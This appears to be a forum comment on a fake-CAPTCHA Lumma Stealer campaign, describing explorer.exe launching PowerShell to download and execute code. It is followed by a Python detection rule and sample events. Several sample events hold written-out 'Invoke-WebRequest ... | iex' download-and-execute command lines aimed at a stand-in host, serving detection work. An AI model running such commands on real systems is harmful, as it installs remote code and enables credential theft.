Tricky CAPTCHA Caught Dropping Lumma Stealer Malware

www.darkreading.com
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
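
The process chain described in the comment above can be turned into a detection rule. The following is an added example, not part of the original comment or the linked article: it assumes process-creation events with Sysmon Event ID 1 field names (`ParentImage`, `Image`, `CommandLine`), runs over constructed sample events, and also matches the `iwr` alias, which the comment does not mention.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Download cmdlet (or its iwr alias) and Invoke-Expression (or iex), in any order.
DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr)\b", re.IGNORECASE)
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.IGNORECASE)


def is_explorer_ps_download_exec(event: dict) -> bool:
    """True when explorer.exe spawns powershell.exe with download-and-execute."""
    parent = basename(event.get("ParentImage", "")).lower()
    image = basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    return (
        parent == "explorer.exe"
        and image == "powershell.exe"
        and bool(DOWNLOAD.search(cmd))
        and bool(EXECUTE.search(cmd))
    )


def flagged_indices(events: list) -> list:
    """Positions of the events that match the rule."""
    return [i for i, e in enumerate(events) if is_explorer_ps_download_exec(e)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events; the URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://example.invalid/a.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem"},
    # Same command line, different parent: outside the chain this rule targets.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": 'powershell.exe -c "iwr https://example.invalid/a.txt | iex"'},
    {"ParentImage": r"C:\WINDOWS\Explorer.EXE", "Image": PS,
     "CommandLine": 'PowerShell.exe -c "IEX (iwr https://example.invalid/b.txt)"'},
]

if __name__ == "__main__":
    for i in flagged_indices(SAMPLE_EVENTS):
        print("ALERT:", SAMPLE_EVENTS[i]["CommandLine"])
```

A plain substring match like this misses encoded or string-concatenated command lines, so it works best alongside PowerShell script block logging rather than in place of it.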